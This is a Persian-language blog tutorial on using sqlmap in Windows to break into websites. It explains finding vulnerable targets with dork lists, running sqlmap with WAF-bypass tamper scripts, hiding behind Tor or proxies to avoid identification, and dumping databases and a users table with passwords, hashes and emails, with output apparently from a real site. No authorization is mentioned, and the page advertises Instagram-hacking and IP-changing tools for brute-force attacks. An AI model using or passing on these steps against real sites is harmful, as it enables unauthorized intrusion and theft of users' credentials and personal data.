آموزش ابزار SQLMAP در ویندوز

آموزش کار با ابزار sqlmap در ویندوز

ابزار SQLMAP چیست؟?

SQLmap یک ابزار منبع باز هست دوستان که در تست نفوذ برای شناسایی و بهره برداری از نقص های تزریق SQL استفاده می شود. SQLmap فرآیند شناسایی و بهره برداری از تزریق SQL را خودکار می کند. حملات SQL Injection می توانند کنترل پایگاه های داده ای را که از SQL استفاده می کنند، در دست بگیرد. آنها می توانند بر هر وب سایت یا برنامه وب که ممکن است پایگاه داده SQL به آن پیوند داده شده باشد، مانند MySQL، SQL Server، Oracle و بسیاری دیگر، تأثیر بگذارند. این پایگاه‌های اطلاعاتی اغلب حاوی داده‌های حساسی مانند اطلاعات مشتری، اطلاعات شخصی، اسرار تجاری، داده‌های مالی و غیره هستند. یافتن آسیب‌پذیری‌های SQL و دفاع در برابر آنها حیاتی است. SQLmap می تواند در یافتن این آسیب پذیری ها کمک کند.

نصب sqlmap در ویندوز

از اونجایی که این ابزار با زبان پایتون نوشته شده است پس در هر سیستم عامل ما میتونیم ازش استفاده کنیم چه لینوکس و چه ویندوز در هردو قابل استفاده هست ما در این مقاله قصد داریم کار با ابزار sqlmap در ویندوز یاد بدیم و چند دستور مهم به شما بگیم اگر شما علاقه به دنیای هک و امنیت دارید و میخواهید اطلاعات بیشتر به دانش خودتون اضافه کنید میتونید از پکیج ابتدا تا انتها کار با کالی لینوکس و nmap ما استفاده کنید در این پکیج با تمام ابزار های کالی لینوکس به صورت کامل با شما کار میکنیم و اطلاعات خیلی مفیدی میتونید دریافت کنید

اسکن آسیب پذیری سایت برای تزریق sql

اولین مرحله برای تزریق sql باید مطمعن شوید که این سایت آسیپ پذیر هست یا نه که میتونید برای تست آسیب پذیری تزریق sql از ابزار sqliv استفاده کنید شما میتونید با استفاده از این ابزار یک لیست از دورک ها روی سایت هدف چک کنید و اگر سایت در برابر تزریق اسیب پذیر بود میتونید متوجه بشید و تزریق با sqlmap شروع کنید ولی اگه سایت باگ sql نداشت که باید سراغ حملات دیگه برید مانند حمله XXS یا CSRF و… ما در پکیج ابتدا تا انتها کار با کالی لینوکس این حملات با ابزارهای کالی لینوکس به شما توضیح دادیم.میتونید این اطلاعات در  پکیج آموزش کالی لینوکس دریافت کنید

نصب sqlmap در ویندوز

 این ابزار همانطور که گفتم با پایتون نوشته شده است و شما فقط کافیه پایتون  روی سیستم شما نصب باشه و ابزار sqlmap از گیت هاب دانلود کنید و بعد از دانلود وارد پوشه هدف بشید از طریق cmd میتونید برای وارد شدن از طریق cmd از دستور زیر استفاده کنید

				
					cd آدرس پوشه
				
			

سپس آدرس صفحه ای که باگ داشته و از طریق اسکن با ابزار sqliv به دست اوردید باید به ابزار sqlmap بدید با دستور زیر میتونید ابزار اجرا کنید

				
					python sqlmap.py -url domin.com/dork
				
			

-url به معنای وارد کردن آدرس سایت هدف هستش و شما باید به جای domin.com آدرس سایت هدف وارد کنید و dork هم باید دورکی که از ابزار sqliv به دست اوردید بعد از دامنه هدف وارد کنید چندین نمونه از ساختار  دورک ها را میتونید در لیست زیر ببینید (دورک پیشفرض این ابزار vuln.php?id=1 هستش که میتونید استفاده کنید)

				
					viewtopic.php?id=13914
page.php?id=31
news_view.php?id=92
index.php?id=9
page.php?ID=2546
section.php?id=5
detail.php?id=118
product.php?ID=541
detail.php?id=6
event.php?id=11184
results.php?category=1
gallery.php?id=650
article.php?id=2
index.html?staff_id=8
				
			

مرحله بعدی وارد کردن LEVEL– و RISK– هستش RISK– به معنای ریسک نوع بارهای استفاده شده توسط ابزار را امکان پذیر می کند. به‌طور پیش‌فرض، از مقدار 1 استفاده می‌کند و می‌توان آن را تا سطح 3 پیکربندی کرد. سطح 3 که حداکثر است، شامل برخی پرس‌وجوهای SQL سنگین است. شما میتونید برای تزریق اول از حالت پیشفرض 1 استفاده کنید و اگه جواب نگرفتید از حالت دوم و سوم استفاده کنید LEVEL —  به معنای سطح، تعداد تشخیص تزریق SQL هست که باید انجام شود را مشخص می‌کند. مقدار از 1 تا 5 متغیر است. 5 که حداکثر است، شامل  افزایش تعداد در اسکن می شود. اگر SQLMap قادر به تشخیص تزریق در تنظیمات پیش فرض نباشد، میتونید دوم و سوم تا پنجم امتحان کنید پس ما تا اینجا دستور خودمونو به شکل زیر مینویسیم 

				
					python sqlmap.py -url domin.com/dork --level=1 --RISK=1
				
			

دور زدن فایروال در SQLMAP

دوستان ما در sqlmap این تونایی داریم که فایروال های وب دور بزنیم و اگر ترافیک ما توسط waf(فایروال وب) مسدود شد ما بتونیم به روش دیگر درخواست خودمونو بفرستیم ما میتونیم از tamper– استفاده کنیم به معنای اسکریپت های دستکاری شده ای است که درخواست ها را به گونه ای تغییر میدهد که قوانین تشخیص WAF (فایروال برنامه وب) را دور بزند. در برخی موارد ممکن است لازم باشد برخی از اسکریپت های دستکاری را با هم ترکیب کنید تا WAF را فریب دهید. البته باید شما بدونید که افزونه امنیتی که سایت استفاده میکنه چه نوع دیوار آتشی قرار داده برای محافظت از وبسایت و سپس از اسکریپ های لازم استفاده کنید و اگر اطلاعاتی نتونستید به دست بیارید راجب نوع فایروال میتونید اسکریپ ها را ترکیب کنید پس ما تا اینجا دستورات خودمونو به شکل زیر مینویسیم

				
					python sqlmap.py -url domin.com/dork --level=1 --RISK=1 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces
				
			

اگر میخواهید لیست کامل اسکریپ ها را ببینید میتونید از دستور زیر استفاده کنید

				
					python sqlmap.py --list-tampers
				
			

راه اندازی شبکه تور در sqlmap

شما برای اینکه ناشناس بمونید و غیر قابل شناسایی باشید میتونید از پروکسی و شبکه تور در این ابزار استفاده کنید Sqlmap پشتیبانی بسیار خوبی برای استفاده از پراکسی های رایج یا tor دارد گزینه –tor به طور پیش فرض سعی می کند از پروکسی HTTP به جای SOCKS5 استفاده کند. بنابراین لازم است تا نوع type را به SOCKS5 مشخص کنیم. شما برای استفاده از شبکه تور در ویندوز باید تور و فایل torcc را در ویندوز پیکربندی کنید برای انجام این کار میتونید از ابزاری که وبسایت فراثروت طراحی و انتشار داده است استفاده کنید.ابزار تغییر دهنده ایپی که در پکیج هک اینستاگرام میتونید دریافت کنید شبکه تور را در سیستم عامل شما فعال میکند و میتونید از این ابزار هم به عنوان یک فیلتر شکن قوی برای وبگردی استفاده کنید و اینکه برای درخواست هایی که نیاز به تغییر آیپی دارند استفاده کنید ابزار هایی مانند کرکر ها که برای حمله بروت فورس نیاز هست آیپی خودتونو عوض کنید قابل استفاده هستش یا یک مثال دیگه ابزاهایی از جمله sqlmap,wpscan و.. که لازم به تغییر آیپی هست میتونید با ابزار تغییر دهنده آیپی این کار انجام بدهید.ابتدا تغییر دهنده آیپی باز کنید و روی 20 ثانیه تنظیم کنید سپس روی go کلیک کنید تا شبکه تور روی سیستم شما فعال بشه اگر که نخواستید از شبکه تور استفاده کنید میتونید از پروکسی استفاده کنید ولی مشکلی که وجود داره اینه که پروکسی قطع و وصل میشه و باعث میشه ابزار sqlmapدر وسط کار به مشکل بربخوره شما میتونید برای دریافت پروکسی لیست از این سایت استفاده کنید لطفا با فیلتر شکن وارد بشید

نرم افزار تغییر دهده آیپی

بعد از فعال کردن شبکه تور دستور خودمونو در ابزار به این شکل مینویسیم

				
					python sqlmap.py -url domin.com/dork --level=1 --RISK=1 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces --tor --tor-type=SOCKS5  --check-tor
				
			

و اگر از پروکسی استفاده میکنید به این شکل بنویسید

				
					python sqlmap.py -url domin.com/dork --level=1 --RISK=1 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces  –proxy=پروکسی مورد نظر
				
			

استخراج پایگاه داده در sqlmap

و آخرین گزینه که باید استفاده کنید برای شروع  dbs– هستش این گزینه تمام دیتابس های سایت هدف برای شما پیدا میکنه و بهتون نمایش میده پس  دستور خودمونو به این شکل مینویسیم

				
					python sqlmap.py -url domin.com/dork --level=1 --RISK=1 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces --tor --tor-type=SOCKS5  --check-tor --dbs
				
			

سپس اینتر میزنید تا ابزار کار خودش انجام بده چند دقیقه بعد اگر ابزار پایگاه های داده برای شما پیدا کرد به شکل زیر بهتون نمایش میده

				
					[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
				
			

در قسمت  available databases [2]: به شما میگه که چندتا دیتابس پیدا کرده و براتون لیست میکنه شما میتونید جداول دیتابسی که قصد دارید اطلاعات داخلشو به دست بیارید استراج کنید از دستور  tables– استفاده میکنیم و با  D- نام دیتابس را مینویسیم و اینتر را میزنیم

دریافت ستون های جدول در sqlmap

				
					[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
				
			

بعد از اینکه اینتر زدید خروجی شبیه بالا میتونه باشه الان که لیست جداول داریم میتونیم ستون های جدول به دست بیاریم مانند پسورد و نام های کاربری یا ایمیل شخص صاحب سایت و غیره میتونیم از یکی از ستون های مهم در دیتابس به دست بیاریم به اسم users میتونید از دستور زیر استفاده کنید

				
					--columns -D safecosmetics -T users
				
			

در قسمت  available databases [2]: به شما میگه که چندتا دیتابس پیدا کرده و براتون لیست میکنه شما میتونید جداول دیتابسی که قصد دارید اطلاعات داخلشو به دست بیارید استراج کنید از دستور  tables– استفاده میکنیم و با  D- نام دیتابس را مینویسیم و اینتر را میزنیم

				
					[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
				
			
خروجی به شکل بالا خواهد بود

امیدوارم از این مقاله خوشتان اومده باشه اگه دوست دارید کار با ابزار sqlmap و همچون ابزار های کالی لینوکس کامل به صورت ویدیویی ببینید و یاد بگیرید میتونید از پکیج ابتدا تا انتها کار با کالی لینوکس و ابزار nmap در سایت ما استفاده کنید

guest
0 نظرات
بازخورد (Feedback) های اینلاین
View all comments
-
-
درباره ما
وقتی که وارد دنیای کامپیوتر شدم خیلی سردرگم بودم که باید چه چیزی یاد بگیرم و چه هدفی داشته باشم هم برای کسب درآمد و هم دنبال علاقه خود برم خیلی راه ها را امتحان کردم ولی نتیجه کافی نگرفتم تا اینکه با طراحی وب سایت و زبان برنامه نویسی پایتون اشنا شدم و تونستم هدف خودم پیدا کنم و دوست داشتم این تجربه هایی که کسب میکنم و هنوز هم دارم یاد میگیرم در اختیار همگی بزارم تا اینکه وب سایت فراثروت راه اندازی کردم
0
لطفا نظر بدهید خوشحال میشم:)x
دوره آموزش کامل PHP و SQL
دوره آموزش کامل PHP و SQL منتشر شد + پروژه های جذاب و شگفت انگیز

لینک دانلود افزونه جت تب jetTabs

لینک دانلود-فراثروت

لینک دانلود آموزش صفر تا صد کالی لینوکس

لینک دانلود-فراثروت